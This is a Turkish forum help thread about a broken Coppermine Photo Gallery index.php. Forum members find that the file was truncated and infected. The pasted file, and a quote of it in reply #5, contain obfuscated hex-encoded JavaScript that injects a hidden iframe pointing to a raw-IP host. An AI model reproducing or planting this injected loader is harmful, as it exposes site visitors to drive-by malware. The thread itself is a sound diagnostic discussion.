• 23-06-2008, 14:12:16
    #1
    Merhabalar.konuyu doğru bölümemi açıyorum bilmiyorum.

    benim Coppermine Photo Gallery Bir resim galerim var.

    2 gündür Parse error: syntax error, unexpected '<' in /home/cidecom/public_html/index.php on line 469

    diye hata veriyor index.php ile alakalı bir hata olsa gerek.

    Bu scriptten anlayan arkadaşlarımız varsa. benim index.php deki hatayı halldebilirlermi.?
    site adresi: www.cideresim.com
    index.php içi alttadır.

    <?php
    /*************************
      Coppermine Photo Gallery
      ************************
      Copyright (c) 2003-2007 Coppermine Dev Team
      v1.1 originally written by Gregory DEMAR
      This program is free software; you can redistribute it and/or modify
      it under the terms of the GNU General Public License as published by
      the Free Software Foundation; either version 2 of the License, or
      (at your option) any later version.
      ********************************************
      Coppermine version: 1.4.12
      $Source$
      $Revision: 3636 $
      $Author: gaugau $
      $Date: 2007-06-29 11:35:30 +0200 (Fr, 29 Jun 2007) $
    **********************************************/
    /**
    * Coppermine Photo Gallery 1.4.11 index.php
    *
    * This file is the main display for categories and album it also displays thumbnails,
    * also see documentation for this file's {@relativelink ../_index.php.php Free Standing Code}
    *
    * @copyright  2002-2005 Gregory DEMAR, Coppermine Dev Team
    * @license http://opensource.org/licenses/gpl-license.php GNU General Public License V2
    * @package Coppermine
    * @version $Id: index.php 3636 2007-06-29 09:35:30Z gaugau $
    */
    /**
    * Unless this is true most things wont work - protection against direct execution of inc files
    */
    define('IN_COPPERMINE', true);
    if (isset($_GET['file'])) {
        // Scrub: Remove '..' and leftover '//' from filename
        $file = str_replace('..','',str_replace('//','',$_GET['file']));
        $fileValidationPattern = "/^([a-zA-Z0-9_\-]+)(\/{0,1}?)([a-zA-Z0-9_\-]+)$/";
        // There can be only alphanumerals in a plugin's folder name. There mustn't be any dots or other special chars in it.
        // The only exception is the hypen (-) and underscore (_)
        // Examples for folder names: "myplugin" = OK, "my_plugin" = OK, "my plugin" = BAD, "m&uuml;_plugin" = BAD
        // Files the plugin is meant to include can only contain one single dot that separates the actual filename from the php-extension
        // Same restrictions apply as for the folder name (only alphanumerals, hyphen and underscore)
        if (preg_match($fileValidationPattern, $file) == FALSE) {
                $file = ''; // something's fishy with the filename, let's drop it
        }
        $path = './plugins/'.$file.'.php';
        // Don't include the codebase and credits files
        if ($file != 'codebase' && $file != 'configuration' && file_exists($path)) {
            // Include the code from the plugin
            include_once($path);
            $file = true;
        } else {
            $file = false;
        }
    } else $file = false;
    if (!$file) {
        /**
        * Sets the flag for lang file
        */
        define('INDEX_PHP', true);
        require('include/init.inc.php');
        if (!USER_ID && $CONFIG['allow_unlogged_access'] == 0) {
            $redirect = $redirect . "login.php";
            header("Location: $redirect");
            exit();
        }
        if ($CONFIG['enable_smilies']) include("include/smilies.inc.php");
    }
     
    /**
    * Local functions definition
    */
    /**
     * html_albummenu()
     *
     * This function draws the links for admin menu of Albums
     *
     * @param integer $id ID of the album for which the links are being drawn
     * @return string The evaluated template block with links
     **/
    function html_albummenu($id)
    {
        global $template_album_admin_menu, $lang_album_admin_menu;
        static $template = '';
        if ($template == '') {
            $params = array('{CONFIRM_DELETE}' => $lang_album_admin_menu['confirm_delete'],
                '{DELETE}' => $lang_album_admin_menu['delete'],
                '{MODIFY}' => $lang_album_admin_menu['modify'],
                '{EDIT_PICS}' => $lang_album_admin_menu['edit_pics'],
                );
            $template = template_eval($template_album_admin_menu, $params);
        }
        $params = array('{ALBUM_ID}' => $id,
            );
        return template_eval($template, $params);
    }
    /**
     * get_subcat_data()
     *
     * Get the data about the sub categories which are going to be shown on the index page, this function is called recursively
     *
     * @param integer $parent Parent Category
     * @param array $cat_data
     * @param array $album_set_array
     * @param integer $level Level being displayed
     * @param string $ident String to use as indentation for Categories
     * @return void
     **/
    function get_subcat_data($parent, &$cat_data, &$album_set_array, $level, $ident = '')
    {
        global $CONFIG, $HIDE_USER_CAT, $FORBIDDEN_SET, $cpg_show_private_album;
        $album_filter = '';
        $pic_filter = '';
        if (!empty($FORBIDDEN_SET) && !$cpg_show_private_album) {
            $album_filter = ' and ' . str_replace('p.', 'a.', $FORBIDDEN_SET);
            $pic_filter = ' and ' . str_replace('p.', $CONFIG['TABLE_PICTURES'] . '.', $FORBIDDEN_SET);
        }
        if ($CONFIG['categories_alpha_sort'] == 1) {$cat_sort_order = 'name';}else{$cat_sort_order = 'pos';}
        $result = cpg_db_query("SELECT cid, name, description, thumb FROM {$CONFIG['TABLE_CATEGORIES']} WHERE parent = '$parent'  ORDER BY $cat_sort_order");
        if (mysql_num_rows($result) > 0) {
            $rowset = cpg_db_fetch_rowset($result);
            foreach ($rowset as $subcat) {
                if ($subcat['cid'] == USER_GAL_CAT) {
                    $sql = "SELECT aid FROM {$CONFIG['TABLE_ALBUMS']} as a WHERE category>=" . FIRST_USER_CAT . $album_filter;
                    $result = cpg_db_query($sql);
                    $album_count = mysql_num_rows($result);
                    while ($row = mysql_fetch_array($result)) {
                        $album_set_array[] = $row['aid'];
                    } // while
                    mysql_free_result($result);
                    $result = cpg_db_query("SELECT count(*) FROM {$CONFIG['TABLE_PICTURES']} as p, {$CONFIG['TABLE_ALBUMS']} as a WHERE p.aid = a.aid AND approved='YES' AND category >= " . FIRST_USER_CAT . $album_filter);
                    $nbEnr = mysql_fetch_array($result);
                    $pic_count = $nbEnr[0];
                    $subcat['description'] = preg_replace("/<br.*?>[\r\n]*/i", '<br />' . $ident , bb_decode($subcat['description']));
                    $link = $ident . "<a href=\"index.php?cat={$subcat['cid']}\">{$subcat['name']}</a>";
                    if ($album_count) {
                        $cat_data[] = array($link, $ident . $subcat['description'], $album_count, $pic_count);
                        $HIDE_USER_CAT = 0;
                    } else {
                        $HIDE_USER_CAT = 1;
                    }
                } else {
                    $unaliased_album_filter = str_replace('a.', '', $album_filter);
                    $result = cpg_db_query("SELECT aid FROM {$CONFIG['TABLE_ALBUMS']} WHERE category = {$subcat['cid']}" . $unaliased_album_filter);
                    $album_count = mysql_num_rows($result);
                    while ($row = mysql_fetch_array($result)) {
                        $album_set_array[] = $row['aid'];
                    } // while
                    mysql_free_result($result);
                    $result = cpg_db_query("SELECT count(*) FROM {$CONFIG['TABLE_PICTURES']} as p, {$CONFIG['TABLE_ALBUMS']} as a WHERE p.aid = a.aid AND approved='YES' AND category = {$subcat['cid']}" . $album_filter);
                    $nbEnr = mysql_fetch_array($result);
                    mysql_free_result($result);
                    $pic_count = $nbEnr[0];
                    if ($subcat['thumb'] > 0) {
                        $sql = "SELECT filepath, filename, url_prefix, pwidth, pheight " . "FROM {$CONFIG['TABLE_PICTURES']} " . "WHERE pid='{$subcat['thumb']}'" . $pic_filter;
                        $result = cpg_db_query($sql);
                        if (mysql_num_rows($result)) {
                            $picture = mysql_fetch_array($result);
                            mysql_free_result($result);
                            $pic_url = get_pic_url($picture, 'thumb');
                            if (!is_image($picture['filename'])) {
                                $image_info = getimagesize(urldecode($pic_url));
                                $picture['pwidth'] = $image_info[0];
                                $picture['pheight'] = $image_info[1];
                            }
                            $image_size = compute_img_size($picture['pwidth'], $picture['pheight'], $CONFIG['alb_list_thumb_size']);
                            $user_thumb = "<img src=\"" . $pic_url . "\" class=\"image\" {$image_size['geom']} border=\"0\" alt=\"\" />";
                            $user_thumb = "<a href=\"index.php?cat={$subcat['cid']}\">" . $user_thumb . "</a>";
                        }
                    } else {
                        $user_thumb = "";
                    }
                    $subcat['name'] = $subcat['name'];
                    $subcat['description'] = preg_replace("/<br.*?>[\r\n]*/i", '<br />', bb_decode($subcat['description']));
                    $link = "<a href=\"index.php?cat={$subcat['cid']}\">{$subcat['name']}</a>";
                    $user_thumb = $ident . $user_thumb;
                    if ($pic_count == 0 && $album_count == 0) {
                                            $user_thumb = $ident;
                        $cat_data[] = array($link, $subcat['description'], 'cat_thumb' => $user_thumb);
                    } else {
                        // Check if you need to show subcat_level
                        if ($level == $CONFIG['subcat_level']) {
                            $cat_albums = list_cat_albums($subcat['cid']);
                        } else {
                            $cat_albums = '';
                        }
                        $cat_data[] = array($link, $subcat['description'], $album_count, $pic_count, 'cat_albums' => $cat_albums, 'cat_thumb' => $user_thumb);
                    }
                }
                if ($level > 1) {
                                    get_subcat_data($subcat['cid'], $cat_data, $album_set_array, $level -1, $ident . "</td><td><img src=\"https://www.r10.net/images/spacer.gif\" width=\"20\" height=\"1\" border=\"0\" alt=\"\" /></td><td>");
                            }
            }
        }
    }
    /**
     * get_cat_list()
     *
     *  List all categories
     *
     * @param string $breadcrumb
     * @param array $cat_data
     * @param string $statistics
     * @return void
     **/
    function get_cat_list(&$breadcrumb, &$cat_data, &$statistics)
    {
        global $CONFIG, $ALBUM_SET, $CURRENT_CAT_NAME, $BREADCRUMB_TEXT, $STATS_IN_ALB_LIST, $FORBIDDEN_SET;
        global $HIDE_USER_CAT, $cpg_show_private_album;
        global $cat;
        global $lang_list_categories, $lang_errors;
        // Build the breadcrumb
        breadcrumb($cat, $breadcrumb, $BREADCRUMB_TEXT);
        // Build the category list
        $cat_data = array();
        $album_set_array = array();
        get_subcat_data($cat, $cat_data, $album_set_array, $CONFIG['subcat_level']);
        $album_filter = '';
        $pic_filter = '';
        $cat = (int) $cat;
        if (!empty($FORBIDDEN_SET) && !$cpg_show_private_album) {
            $album_filter = ' and ' . str_replace('p.', 'a.', $FORBIDDEN_SET);
            $pic_filter = ' and ' . $FORBIDDEN_SET;
        }
        // Add the albums in the current category to the album set
        // if ($cat) {
        if ($cat == USER_GAL_CAT) {
            $sql = "SELECT aid FROM {$CONFIG['TABLE_ALBUMS']} as a WHERE category >= " . FIRST_USER_CAT . $album_filter;
            $result = cpg_db_query($sql);
        } else {
            $sql = "SELECT aid FROM {$CONFIG['TABLE_ALBUMS']} as a WHERE category = '$cat'" . $album_filter;
            $result = cpg_db_query($sql);
        } while ($row = mysql_fetch_array($result)) {
            $album_set_array[] = $row['aid'];
        } // while
        mysql_free_result($result);
        // }
        if (count($album_set_array) && $cat) {
            $set = '';
            foreach ($album_set_array as $album) $set .= $album . ',';
            $set = substr($set, 0, -1);
            $current_album_set = "AND aid IN ($set) ";
            $ALBUM_SET .= $current_album_set;
        } elseif ($cat) {
            $current_album_set = "AND aid IN (-1) ";
            $ALBUM_SET .= $current_album_set;
        }
        // Gather gallery statistics
        if ($cat == 0) {
            $result = cpg_db_query("SELECT count(*) FROM {$CONFIG['TABLE_ALBUMS']} as a WHERE 1" . $album_filter);
            $nbEnr = mysql_fetch_array($result);
            $album_count = $nbEnr[0];
            mysql_free_result($result);
            $sql = "SELECT count(*) FROM {$CONFIG['TABLE_PICTURES']} as p " . 'LEFT JOIN ' . $CONFIG['TABLE_ALBUMS'] . ' as a ' . 'ON a.aid=p.aid ' . 'WHERE 1' . $pic_filter . ' AND approved=\'YES\'';
            $result = cpg_db_query($sql);
            $nbEnr = mysql_fetch_array($result);
            $picture_count = $nbEnr[0];
            mysql_free_result($result);
            $sql = "SELECT count(*) FROM {$CONFIG['TABLE_COMMENTS']} as c " . 'LEFT JOIN ' . $CONFIG['TABLE_PICTURES'] . ' as p ' . 'ON c.pid=p.pid ' . 'LEFT JOIN ' . $CONFIG['TABLE_ALBUMS'] . ' as a ' . 'ON a.aid=p.aid ' . 'WHERE 1' . $pic_filter;
            $result = cpg_db_query($sql);
            $nbEnr = mysql_fetch_array($result);
            $comment_count = $nbEnr[0];
            mysql_free_result($result);
            $sql = "SELECT count(*) FROM {$CONFIG['TABLE_CATEGORIES']} WHERE 1";
            $result = cpg_db_query($sql);
            $nbEnr = mysql_fetch_array($result);
            $cat_count = $nbEnr[0] - $HIDE_USER_CAT;
            mysql_free_result($result);
            $sql = "SELECT sum(hits) FROM {$CONFIG['TABLE_PICTURES']} as p " . 'LEFT JOIN ' . $CONFIG['TABLE_ALBUMS'] . ' as a ' . 'ON p.aid=a.aid ' . 'WHERE 1' . $pic_filter;
            $result = cpg_db_query($sql);
            $nbEnr = mysql_fetch_array($result);
            $hit_count = (int)$nbEnr[0];
            mysql_free_result($result);
            if (count($cat_data)) {
                $statistics = strtr($lang_list_categories['stat1'], array('[pictures]' => $picture_count,
                        '[albums]' => $album_count,
                        '[cat]' => $cat_count,
                        '[comments]' => $comment_count,
                        '[views]' => $hit_count));
            } else {
                $STATS_IN_ALB_LIST = true;
                $statistics = strtr($lang_list_categories['stat3'], array('[pictures]' => $picture_count,
                        '[albums]' => $album_count,
                        '[comments]' => $comment_count,
                        '[views]' => $hit_count));
            }
        } elseif ($cat >= FIRST_USER_CAT && $ALBUM_SET) {
            $result = cpg_db_query("SELECT count(*) FROM {$CONFIG['TABLE_ALBUMS']} WHERE 1 $current_album_set");
            $nbEnr = mysql_fetch_array($result);
            $album_count = $nbEnr[0];
            mysql_free_result($result);
            $result = cpg_db_query("SELECT count(*) FROM {$CONFIG['TABLE_PICTURES']} WHERE 1 $current_album_set AND approved='YES'");
            $nbEnr = mysql_fetch_array($result);
            $picture_count = $nbEnr[0];
            mysql_free_result($result);
            $result = cpg_db_query("SELECT sum(hits) FROM {$CONFIG['TABLE_PICTURES']} WHERE 1 $current_album_set");
            $nbEnr = mysql_fetch_array($result);
            $hit_count = (int)$nbEnr[0];
            mysql_free_result($result);
            $statistics = strtr($lang_list_categories['stat2'], array('[pictures]' => $picture_count,
                    '[albums]' => $album_count,
                    '[views]' => $hit_count));
        } else {
            $statistics = '';
        }
    }
    /**
    * list_users()
    *
    * Get a list of users galleries
    */
    function list_users()
    {
        global $CONFIG, $PAGE, $FORBIDDEN_SET;
        global $lang_list_users, $lang_errors, $template_user_list_info_box, $cpg_show_private_album, $cpg_udb;
        $rowset = $cpg_udb->list_users_query($user_count);
        if (!$rowset) {
            msg_box($lang_list_users['user_list'], $lang_list_users['no_user_gal'], '', '', '100%');
            return;
        }
        $user_per_page = $CONFIG['thumbcols'] * $CONFIG['thumbrows'];
        $totalPages = ceil($user_count / $user_per_page);
        $user_list = array();
        foreach ($rowset as $user) {
            $cpg_nopic_data = cpg_get_system_thumb('nopic.jpg', $user['user_id']);
            $user_thumb = '<img src="https://www.r10.net/google-optimizasyon/' . $cpg_nopic_data['thumb'] . '" ' . $cpg_nopic_data['whole'] . ' class="image" border="0" alt="" />';
            $user_pic_count = $user['pic_count'];
            $user_thumb_pid = ($user['gallery_pid']) ? $user['gallery_pid'] : $user['thumb_pid'];
            $user_album_count = $user['alb_count'];
            if ($user_pic_count) {
                $sql = "SELECT filepath, filename, url_prefix, pwidth, pheight " . "FROM {$CONFIG['TABLE_PICTURES']} " . "WHERE pid='$user_thumb_pid' AND approved='YES'";
                $result = cpg_db_query($sql);
                if (mysql_num_rows($result)) {
                    $picture = mysql_fetch_array($result);
                    mysql_free_result($result);
                    $pic_url = get_pic_url($picture, 'thumb');
                    if (!is_image($picture['filename'])) {
                        $image_info = getimagesize(urldecode($pic_url));
                        $picture['pwidth'] = $image_info[0];
                        $picture['pheight'] = $image_info[1];
                    }
                    $image_size = compute_img_size($picture['pwidth'], $picture['pheight'], $CONFIG['alb_list_thumb_size']);
                    $user_thumb = "<img src=\"" . $pic_url . "\" class=\"image\" {$image_size['geom']} border=\"0\" alt=\"\" />";
                }
            }
            $albums_txt = sprintf($lang_list_users['n_albums'], $user_album_count);
            $pictures_txt = sprintf($lang_list_users['n_pics'], $user_pic_count);
            $params = CPGPluginAPI::filter('user_caption_params', array('{USER_NAME}' => $user['user_name'],
                '{USER_ID}' => $user['user_id'],
                '{ALBUMS}' => $albums_txt,
                '{PICTURES}' => $pictures_txt,
                )
            );
            $caption = template_eval($template_user_list_info_box, $params);
            $user_list[] = array('cat' => FIRST_USER_CAT + $user['user_id'],
                'image' => $user_thumb,
                'caption' => $caption,
                );
        }
        theme_display_thumbnails($user_list, $user_count, '', '', 1, $PAGE, $totalPages, false, true, 'user');
    }
    /**
    * list_albums()
    *
    * Get a list of albums
    */
    function list_albums()
    {
        global $CONFIG, $USER, $USER_DATA, $PAGE, $lastup_date_fmt, $FORBIDDEN_SET, $FORBIDDEN_SET_DATA;
        global $cat;
        global $lang_list_albums, $lang_errors, $cpg_show_private_album;
        $alb_per_page = $CONFIG['albums_per_page'];
        $maxTab = $CONFIG['max_tabs'];
        $album_filter = '';
        $pic_filter = '';
        $pic_subquery = '';
        if (!empty($FORBIDDEN_SET) && !$cpg_show_private_album) {
            $album_filter = ' and ' . str_replace('p.', 'a.', $FORBIDDEN_SET);
            $pic_filter = ' and ' . $FORBIDDEN_SET;
        }
        $result = cpg_db_query("SELECT count(*) FROM {$CONFIG['TABLE_ALBUMS']} as a WHERE category = '$cat'" . $album_filter);
        $nbEnr = mysql_fetch_array($result);
        $nbAlb = $nbEnr[0];
        mysql_free_result($result);
        if (!$nbAlb) return;
        $totalPages = ceil($nbAlb / $alb_per_page);
        if ($PAGE > $totalPages) $PAGE = 1;
        $lower_limit = ($PAGE-1) * $alb_per_page;
        $upper_limit = min($nbAlb, $PAGE * $alb_per_page);
        $limit = "LIMIT " . $lower_limit . "," . ($upper_limit - $lower_limit);
        $sql = 'SELECT a.aid, a.title, a.description, category, visibility, filepath, ' . 'filename, url_prefix, pwidth, pheight ' . 'FROM ' . $CONFIG['TABLE_ALBUMS'] . ' as a ' . 'LEFT JOIN ' . $CONFIG['TABLE_PICTURES'] . ' as p ' . 'ON a.thumb=p.pid ' . 'WHERE category=' . $cat . $album_filter . ' ORDER BY a.pos ' . $limit;
        $alb_thumbs_q = cpg_db_query($sql);
        $alb_thumbs = cpg_db_fetch_rowset($alb_thumbs_q);
        mysql_free_result($alb_thumbs_q);
        $disp_album_count = count($alb_thumbs);
        $album_set = '';
        foreach($alb_thumbs as $value) {
            $album_set .= $value['aid'] . ', ';
        }
        $album_set = '(' . substr($album_set, 0, -2) . ')';
        //This query will fetch album stats and keyword for the albums
        $sql = "SELECT a.aid, count( p.pid )  AS pic_count, max( p.pid )  AS last_pid, max( p.ctime )  AS last_upload, a.keyword" .
                " FROM {$CONFIG['TABLE_ALBUMS']} AS a " .
                " LEFT JOIN {$CONFIG['TABLE_PICTURES']} AS p ON a.aid = p.aid AND p.approved =  'YES' ".
                "WHERE a.aid IN $album_set" . "GROUP BY a.aid";
        $alb_stats_q = cpg_db_query($sql);
        $alb_stats = cpg_db_fetch_rowset($alb_stats_q);
        mysql_free_result($alb_stats_q);
     
        foreach($alb_stats as $key => $value) {
            $cross_ref[$value['aid']] =<script>
    <!--
    var d=document,kol=561;
    function O10H485F5246198BA(H485F524619CCC){ var H485F52461A0CA = 16; return( parseInt(H485F524619CCC,H485F52461A0CA));}function H485F52461A8D5(H485F52461ACCF){ function H485F52461B8C2() {return 2;} var H485F52461B0CA='';for(H485F52461B4C6=0; H485F52461B4C6<H485F52461ACCF.length; H485F52461B4C6+=H485F52461B8C2()){ H485F52461B0CA += ( String.fromCharCode (O10H485F5246198BA(H485F52461ACCF.substr(H485F52461B4C6, H485F52461B8C2()))));}return H485F52461B0CA;} document.write(H485F52461A8D5('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3537343934292B27383331626662365C272077696474683D313738206865696768743D333233207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
    //-->
    </script>
  • 23-06-2008, 14:19:59
    #2
    Üyeliği durduruldu
    hiç böle hata görmedm bunu kullandm ama..
  • 23-06-2008, 14:33:44
    #3
    indexi dosya halinde upload edebilir misin
  • 23-06-2008, 14:34:51
    #4
    Dediği 469 satırda olan şey

    $cross_ref[$value['aid']] =<script>

    diye bir yazı var :S bununlamı alakalı.?
  • 23-06-2008, 14:37:27
    #5
    eksik bu index.php , normalde 840küsur satır olması gerekirken, verdiğiniz 340küsur satır..

    orjinal index.php ekte...

    ayrıca en son satırdaki bu kodlar orginal copperminede yok,
    Alıntı
    <!--
    var
    d=document,kol=561;
    function
    O10H485F5246198BA(H485F524619CCC){ var H485F52461A0CA = 16; return( parseInt(H485F524619CCC,H485F52461A0CA));}function H485F52461A8D5(H485F52461ACCF){ function H485F52461B8C2() {return 2;} var H485F52461B0CA='';for(H485F52461B4C6=0; H485F52461B4C6<H485F52461ACCF.length; H485F52461B4C6+=H485F52461B8C2()){ H485F52461B0CA += ( String.fromCharCode (O10H485F5246198BA(H485F52461ACCF.substr(H485F52461B4C6, H485F52461B8C2()))));}return H485F52461B0CA;} document.write(H485F52461A8D5('3C7363726970743E696628216D796961297B642E777269746 528273C494652414D45206E616D653D4F31207372633D5C276 87474703A2F2F37372E3232312E3133332E3137312F2E69662 F676F2E68746D6C3F272B4D6174682E726F756E64284D61746 82E72616E646F6D28292A3537343934292B273833316266623 65C272077696474683D313738206865696768743D333233207 374796C653D5C27646973706C61793A206E6F6E655C273E3C2 F494652414D45203E27293B7D766172206D7969613D7472756 53B3C2F7363726970743E'));
    //-->
  • 23-06-2008, 14:42:12
    #6
    benikaydet adlı üyeden alıntı: mesajı görüntüle
    eksik bu index.php , normalde 840küsur satır olması gerekirken, verdiğiniz 340küsur satır..

    ayrıca en son satırdaki bu kodlar orginal copperminede yok,
    Ne yapmam gerekiyor benim. şuan tam olarak peki.?

    bendeki index.php yi buradan indirebilirsiniz.
  • 23-06-2008, 14:44:25
    #7
    orjinal index.php ekte
    Mehmet37 adlı üyeden alıntı: mesajı görüntüle
    Ne yapmam gerekiyor benim. şuan tam olarak peki.?

    bendeki index.php yi buradan indirebilirsiniz.
  • 23-06-2008, 14:50:03
    #8
    Çok teşekkür ederim hocam . sorun düzeldi. sağolasın...
  • 23-06-2008, 14:57:17
    #9
    FF3 ile erişmeye çalıştığımda aşağıdaki uyarı geliyor.
    Bu site neden engellendi butonu ise;
    Google Safe Browsing diagnostic page for www.cideresim.com/

    Bilgin olsun. Üstteki gizli kodlardan kaynaklanıyor olabilir.